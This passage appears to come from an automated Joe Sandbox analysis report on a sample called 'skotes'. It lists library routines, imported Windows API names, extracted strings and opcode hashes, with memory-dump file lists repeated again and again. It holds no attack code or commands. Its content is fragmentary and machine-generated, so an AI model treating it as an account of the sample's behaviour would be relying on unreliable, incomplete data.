                                                                                                                                                                                            • Opcode ID: 2e93662add34a9c4f8635ce7ab631e7b1fd1ddc8dcba23b2f5305abc0a67ea5c
                                                                                                                                                                                            • Instruction ID: 52412b56ccf5bfd6ccca5f63e4335b6dc39aee180c5dff369ed8b33cb900aed6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e93662add34a9c4f8635ce7ab631e7b1fd1ddc8dcba23b2f5305abc0a67ea5c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5021E272A04205AFCB14DFA8DD46AAAF7AAFF84720F14411DF91197280DF31F90096E4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                                                                            • Opcode ID: 6f03b151b42364e5e230b6c97b2bee0e2f97f0c6e858e5a7098ce250983f90b0
                                                                                                                                                                                            • Instruction ID: 82136c651350a891402135f48226917d6ca69717482c61f29a70eaaf325b3f80
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f03b151b42364e5e230b6c97b2bee0e2f97f0c6e858e5a7098ce250983f90b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22010067608A2729763520189D02BAA178B8BC2BB4F2A102EFC54FB2C1EF44DD4261E4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0061FB06
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                            • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                            • API String ID: 348560076-465693683
                                                                                                                                                                                            • Opcode ID: 63c97f00e846b5b995499f617cd2ef3cc68b3106888fe83b2609824ac35d7839
                                                                                                                                                                                            • Instruction ID: c020c9784cafcbdbc5178c5eebd58a8f481f92ad81d15ca03c0c43b6089515f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 63c97f00e846b5b995499f617cd2ef3cc68b3106888fe83b2609824ac35d7839
                                                                                                                                                                                            • Instruction Fuzzy Hash: 76012822A457256DA71077B96C4BEEB35DF8E0A705F251D3EB801E7243EFE4C8444564
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • StructuredWorkStealingQueue.LIBCMT ref: 006320B7
                                                                                                                                                                                              • Part of subcall function 0062CAF3: Mailbox.LIBCMT ref: 0062CB2D
                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006320C8
                                                                                                                                                                                            • StructuredWorkStealingQueue.LIBCMT ref: 006320FE
                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0063210F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                            • String ID: e
                                                                                                                                                                                            • API String ID: 1411586358-4024072794
                                                                                                                                                                                            • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                            • Instruction ID: bc00aeb8b224f05bbe5f654175197841bee860fdb819b328c0b32d019143dbbb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                            • Instruction Fuzzy Hash: A011A331500106ABDB55DE69C9A16AA73A7EF02364F14C19EFD069F202DB71D905CBE0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 0061D069
                                                                                                                                                                                            • kernel32.dll, xrefs: 0061D04C
                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0061D03B
                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 0061D05D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
